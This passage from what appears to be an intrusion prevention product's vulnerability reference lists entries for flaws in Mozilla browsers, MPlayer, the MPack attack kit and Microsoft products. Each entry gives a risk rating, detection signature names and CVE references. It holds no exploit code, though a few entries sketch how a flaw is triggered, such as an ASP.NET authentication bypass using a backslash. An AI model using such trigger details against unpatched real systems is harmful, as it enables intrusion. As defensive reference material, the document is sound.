Description: There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The flaw is due to improper data protection when handling the "overflow" and "underflow" DOM events raised by specific document layout changes. Successful exploitation of this issue can cause a denial of service condition and may allow remote attackers to execute arbitrary code in the context of the target browser.
Situation: HTTP_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
File-Text_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
References:
CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867
BID-24242
http://www.securityfocus.com/bid/24242
OSVDB-35134
http://www.osvdb.org/35134
Back to top

Mozilla-Products-QueryInterface-Method-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla based products
Risk: High
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird
Type: Malfunction
Description: There is a memory corruption vulnerability in various Mozilla based products. The flaw concerns a memory corruption issue caused by the QueryInterface method of the Location and Navigator objects. By persuading the target user to open a web page that contains malicious script, an attacker may execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Mozilla-Products-QueryInterface-Method-Memory-Corruption
File-Text_Mozilla-Products-QueryInterface-Method-Memory-Corruption
References:
CVE-2006-0295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0295
BID-16476
http://www.securityfocus.com/bid/16476
Back to top

Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in the Scalable Vector Graphics rendering engine in Mozilla products
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in certain versions of Mozilla products. The Scalable Vector Graphics (SVG) rendering engine fails to properly handle some property values of the SVG filter element. If the multiplication of 'width' and 'height' properties results in a large enough value, an integer overflow occurs and the engine allocates a memory block that is too small for its need. A remote attacker is able to exploit this vulnerability to cause a denial of service condition or to execute arbitrary code on the victim client.
Situation: HTTP_SS-Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
File-TextId_Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
References:
CVE-2006-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0297
BID-16476
http://www.securityfocus.com/bid/16476
Back to top

Mozilla-Shell-Protocol-Validation

About this vulnerability: A vulnerability in Mozilla
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Mozilla Browser; Mozilla Firefox; Mozilla Thunderbird; Netscape
Type: Input Validation
Description: There exists a vulnerability in the way products based on the Mozilla web engine validate URIs using the shell scheme. Using a specially crafted shell URI, an attacker can run executable files located on a target system, or start applications registered to handle certain file types. This vulnerability can also be used as a remote attack vector to vulnerabilities that would otherwise be considered local only.
Situation: File-Text_Mozilla-Shell-Protocol-Validation
Back to top

Mozilla-Soapparameter-Integer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Mozilla Foundation Mozilla Suite
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Suite
Type: Malfunction
Description: There is a vulnerability in several versions of the Mozilla and Netscape browsers' implementation of the Simple Object Access Protocol (SOAP). A specially crafted HTML page containing script code that leverages this vulnerability can allow an attacker to crash a client's browser application, or potentially introduce arbitrary code into the process flow, compromising the system. Is a simple denial of service attack case, the affected web browser will crash upon opening the malicious HTML page. Similarly, the vulnerable mail client will crash upon opening or previewing the malicious HTML mail. If an attacker performs a more completed code injection attack, then the behaviour of the target is dependant entirely on the injected code. Experiments show that the behaviour of the vulnerable products differ on Linux with regards to the excessively large array that is passed into the constructor SOAPParameter. This large array can be created with a large size (e.g., new Array(...)) or resized to a large size by a large index (e.g., arrayObject[index] = ...). On Linux, Mozilla will attempt to allocate all the elements of the array. First, there is a long wait in Mozilla as it tries to allocate a large array. Second, since the malicious script is attempting to create an array that is over 1 gigabyte in memory, an average system will run out of memory. The Linux operating system will terminate the Mozilla process because of the out of memory condition. As such, the vulnerability is never triggered.
Situation: File-Text_Mozilla-Soapparameter-Integer-Overflow-Vulnerability
References:
CVE-2004-0722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0722
BID-10843
http://www.securityfocus.com/bid/10843
Back to top

Mozilla-SVG-Data-Processing-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Mozilla based browsers
Risk: High
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Malfunction
Description: There is a vulnerability in Mozilla-based browsers, such as Firefox and SeaMonkey. The vulnerability is due to insufficient validation when handling SVG data. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page and may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Mozilla-SVG-Data-Processing-Memory-Corruption
File-TextId_Mozilla-SVG-Data-Processing-Memory-Corruption
References:
CVE-2009-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0771
BID-33990
http://www.securityfocus.com/bid/33990
Back to top

MPack-Attack-Platform

About this vulnerability: MPack Attack Platform
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Malfunction
Description: MPack is an attack platform. It is able to deliver a configurable set of vulnerabilities that affect the browser that the target uses to access the site. Recent versions of MPack take advantage of server-side polymorphism: each request delivers a functionally identical but differently encoded version of the exploit code. In addition, MPack gathers extensive statistics about its targets.
Situation: HTTP_MPack-Invisible-Inline-Frame
HTTP_MPack-JavaScript-Decoder
File-Text_MPack-JavaScript-Decoder
Back to top

MPlayer-For-Windows-Calloc-Integer-Overflow

About this vulnerability: A vulnerability in MPlayer for Win32 Project MPlayer
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MPlayer
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in the MPlayer for Win32 project's port of the MPlayer media player. The integer overflow is due to a unchecked multiplication of two size values in a "calloc" replacement function. A remote attacker could exploit this vulnerability by enticing a target user to open a specially crafted media file in a vulnerable version of MPlayer. Successful exploitation could allow the execution of arbitrary code in the security context of the target user. An unsuccessful exploitation attempt could result in a denial of service condition.
Situation: File-MPEG_MPlayer-For-Windows-Calloc-Integer-Overflow
Back to top

MPlayer-Sami-Subtitle-Buffer-Overflow

About this vulnerability: A vulnerability in MPlayer Project MPlayer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MPlayer
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in MPlayer. Specifically, the vulnerability is due a stack buffer overflow when reading a long caption from a SAMI subtitle file. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to download a crafted SAMI file, resulting in the execution of arbitrary code in the security context of the target user.
Situation: File-TextId_MPlayer-Sami-Subtitle-Buffer-Overflow
References:
OSVDB-74604
http://www.osvdb.org/74604
Back to top

MPlayer-TwinVQ-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in MPlayer
Risk: High
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MPlayer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in MPlayer. The flaw is due to a boundary error when processing TwinVQ files. A remote attacker may exploit this vulnerability by persuading the target user to open a malicious TwinVQ file.
Situation: HTTP_SS-MPlayer-TwinVQ-File-Handling-Buffer-Overflow
File-Binary_MPlayer-TwinVQ-File-Handling-Buffer-Overflow
References:
CVE-2008-5616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5616
BID-32822
http://www.securityfocus.com/bid/32822
Back to top

MS-appinstaller-URI-Scheme

About this vulnerability: ms-appinstaller URI scheme
Risk: Moderate
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Ms-appinstaller protocol handler allows Windows App Installer to install apps directly from a web server. This URI scheme is not enabled by default and is known to be used as an access vector for ransomware and other malware.
Situation: File-Text_MS-appinstaller-URI-Scheme-Link-In-HTML
Back to top

MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004

About this vulnerability: Authentication bypass vulnerability in MS ASP.NET (MS05-004)
Risk: Low
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: Microsoft .NET Framework could allow unauthorized access caused by a canonicalization vulnerability in ASP.NET authorization component, also known as "Path Validation Vulnerability". A remote attacker could bypass the access restrictions for .aspx files by sending a request containing a backslash ('\') or url encoded backslash (%5C).
Situation: HTTP_CSU-MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004
References:
CVE-2004-0847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847
BID-11342
http://www.securityfocus.com/bid/11342
OSVDB-10670
http://www.osvdb.org/10670
MS05-004
http://technet.microsoft.com/security/bulletin/MS05-004
Back to top

MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034

About this vulnerability: Microsoft Windows Compressed Folder Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: dunzip32.dll
Type: Buffer Overflow
Description: Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation.
Situation: File-Zip_MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034
References:
CVE-2004-0575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0575
BID-11382
http://www.securityfocus.com/bid/11382
OSVDB-10695
http://www.osvdb.org/10695
MS04-034
http://technet.microsoft.com/security/bulletin/MS04-034
Back to top

MS-Exchange-URL-Redirection-CVE-2014-6336

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: A vulnerability in Microsoft Exchange
Situation: HTTP_CSU-MS-Exchange-URL-Redirection-CVE-2014-6336
File-Text_MS-Exchange-URL-Redirection-CVE-2014-6336
References:
CVE-2014-6336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6336
MS14-075
http://technet.microsoft.com/security/bulletin/MS14-075
Back to top

MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Forefront Threat Management Gateway Client detected
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Threat Management Gateway Client
Type: Malfunction
Description: A heap buffer overflow vulnerability exists in the Microsoft Forefront Threat Management Gateway 2010 Client. The vulnerability is due to an error in the calculation of a buffer size in the NSPLookupServiceNext function. Potentially any application running on a system could be affected by this vulnerability due to the way Microsoft Forefront Threat Management Gateway is installed on a system.
Situation: Generic_SS-MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
DNS-UDP_MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
References:
CVE-2011-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1889
BID-48181
http://www.securityfocus.com/bid/48181
OSVDB-72933
http://www.osvdb.org/72933
MS11-040
http://technet.microsoft.com/security/bulletin/MS11-040
Back to top

MS-Forefront-UAG-Default-Reflected-XSS

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: High
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1453-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Forefront Unified Access Gateway
Situation: HTTP_CSU-MS-Forefront-UAG-Default-Reflected-XSS
References:
CVE-2011-1897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1897
MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079
Back to top

MS-Forefront-UAG-ExcelTable-Reflected-XSS

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: High
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Forefront Unified Access Gateway
Situation: HTTP_CRL-MS-Forefront-UAG-ExcelTable-Reflected-XSS
References:
CVE-2011-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1896
OSVDB-76233
http://www.osvdb.org/76233
MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079
Back to top

MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: High
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Forefront Unified Access Gateway
Situation: HTTP_CRL-MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS
References:
CVE-2011-1895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1895
BID-49979
http://www.securityfocus.com/bid/49979
OSVDB-76235
http://www.osvdb.org/76235
MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079
Back to top

MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Malfunction
Description: A vulnerability in Microsoft Forefront Unified Access Gateway
Situation: HTTP_CSH-MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability
References:
CVE-2011-2012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2012
BID-49980
http://www.securityfocus.com/bid/49980
MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079
Back to top

MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Malfunction
Description: A vulnerability in Microsoft Forefront Unified Access Gateway
Situation: HTTP_SS-MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
File-Text_MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
References:
CVE-2011-1969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1969
BID-49983
http://www.securityfocus.com/bid/49983
MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079
Back to top

MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error

About this vulnerability: An attempt to exploit vulnerability in Microsoft Host Integration Server detected
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Host Integration Server
Type: Malfunction
Description: A denial of service vulnerability has been reported in the snabase.exe component of Microsoft's Host Integration Server, which is an add-on component of Microsoft's BizTalk Enterprise Service Business suite. Specifically, this vulnerability is due to incorrect memory access when processing certain malicious packets.
Situation: Generic_UDP-MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error
References:
CVE-2011-2008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2008
OSVDB-76224
http://www.osvdb.org/76224
MS11-028
http://technet.microsoft.com/security/bulletin/MS11-028
Back to top

MS-Ie-Async-Null-Object-Access-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Internet Explorer
Situation: File-Text_MS-Ie-Async-Null-Object-Access-Remote-Code-Execution
References:
CVE-2012-1521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1521
MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052
Back to top

MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040

About this vulnerability: Buffer overflow in MS IE FRAME/IFRAME/EMBED tag handling (MS04-040)
Risk: High
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Buffer Overflow
Description: Microsoft Internet Explorer contains a buffer overflow in NAME and SRC attribute handling of FRAME, IFRAME and EMBED tags. A remote attacker could create a specially crafted web page and execute arbitrary code on the vulnerable system once the malicious page is visited. The Bofra worm and MyDoom.AG/AH variants are also known to exploit this vulnerability.
Situation: Generic_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
HTTP_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
File-Text_Internet-Explorer-HTML-Elements-Buffer-Overflow
References:
CVE-2004-1050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1050
BID-11515
http://www.securityfocus.com/bid/11515
OSVDB-11337
http://www.osvdb.org/11337
MS04-040
http://technet.microsoft.com/security/bulletin/MS04-040
Back to top

MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289

About this vulnerability: Malicious script
Risk: Moderate
First detected in: sgpkg-ips-519-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Malicious script
Situation: File-Text_MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289
References:
CVE-2013-1289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1289
MS13-035
http://technet.microsoft.com/security/bulletin/MS13-035
Back to top

MS-Ie-JavaScript-Code-Execution-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1586-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a vulnerability in Internet Explorer
References:
CVE-2012-2522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2522
MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052
Back to top

MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526

About this vulnerability: Malicious style attribute
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0
Type: Malfunction
Description: A malicious style attribute used on a web page
Situation: File-Text_MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526
References:
CVE-2012-1526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1526
MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052
Back to top

MS-Ie-Style-Tag-Comment-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in MS IE
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Microsoft Internet Explorer is vulnerable to a Denial of Service (DoS) attack. By creating a specially-crafted Web page containing a STYLE tag followed by a comment that is not terminated, a remote attacker can cause Internet Explorer to crash, once the Web page is visited.
Situation: File-Text_MS-Ie-Style-Tag-Comment-DoS
References:
CVE-2004-0842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0842
BID-10816
http://www.securityfocus.com/bid/10816
OSVDB-10710
http://www.osvdb.org/10710
MS04-038
http://technet.microsoft.com/security/bulletin/MS04-038
Back to top

MS-IIS-HTTP-TRACK-Logging-Failure

About this vulnerability: MS IIS fails to log HTTP TRACK requests
Risk: Low
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Malfunction
Description: Microsoft Internet Information Server (IIS) fails to properly log HTTP TRACK requests. By sending a specialy-crafted HTTP TRACK request, a remote attacker could cause the server to disclose sensitive information without the request being logged.
Situation: HTTP_CS-MS-IIS-HTTP-TRACK-Logging-Failure
References:
BID-9313
http://www.securityfocus.com/bid/9313
OSVDB-4864
http://www.osvdb.org/4864
Back to top

MS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030

About this vulnerability: Microsoft IIS Server WebDAV XML Requests Denial of Service Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.0; IIS 5.1; IIS 6.0
Type: Malfunction
Description: The WebDAV Message Handler for Internet Information Services 5.0, 5.1, and 6.0 allows remote attackers to cause a denial of service (memory and CPU exhaustion, application crash) via an XML message containing XML elements with a large number of attributes.
Situation: HTTP_CS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030
References:
CVE-2003-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0718
BID-11384
http://www.securityfocus.com/bid/11384
OSVDB-10688
http://www.osvdb.org/10688
MS04-030
http://technet.microsoft.com/security/bulletin/MS04-030
Back to top

MS-Internet-Explorer-CVE_2012-1889

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a vulnerability in Internet Explorer
Situation: File-Text_MS-Internet-Explorer-CVE_2012-1889
References:
CVE-2012-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889
MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3115

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3115
References:
CVE-2013-3115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3115
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3143

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3144
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3143
References:
CVE-2013-3143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3143
BID-60962
http://www.securityfocus.com/bid/60962
OSVDB-94967
http://www.osvdb.org/94967
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3145

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3145
References:
CVE-2013-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3145
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3146

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3146
References:
CVE-2013-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3146
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3147

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3147
References:
CVE-2013-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3147
BID-60966
http://www.securityfocus.com/bid/60966
OSVDB-94971
http://www.osvdb.org/94971
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3148

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3148
References:
CVE-2013-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3148
MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270
References:
CVE-2014-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0270
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276
References:
CVE-2014-0276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0276
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278
References:
CVE-2014-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0278
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

MS-Internet-Explorer-Select-Element-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_SS-MS-Internet-Explorer-Select-Element-Remote-Code-Execution
File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution
References:
CVE-2011-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1999
BID-49964
http://www.securityfocus.com/bid/49964
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

MS-NetDDE-Remote-Buffer-Overflow-MS04-031

About this vulnerability: Microsoft Windows NetDDE Remote Buffer Overflow Vulnerability (MS04-031)
Risk: Moderate
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows NetDDE service
Type: Buffer Overflow
Description: Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. The NetDDE services are not started by default and would have to be manually started, or started by an application that requires NetDDE, for an attacker to attempt to remotely exploit this vulnerability.
Situation: NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031-2
NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031
MSRPC-TCP_CPS-NetDDE-Remote-Buffer-Overflow-MS04-031
References:
CVE-2004-0206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0206
BID-11372
http://www.securityfocus.com/bid/11372
OSVDB-10689
http://www.osvdb.org/10689
MS04-031
http://technet.microsoft.com/security/bulletin/MS04-031
Back to top

MS-NNTP-BOF-MS04-036

About this vulnerability: Microsoft NNTP Component Heap Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003
Software: Exchange Server; Exchange Server 2000; Exchange Server 2003
Type: Buffer Overflow
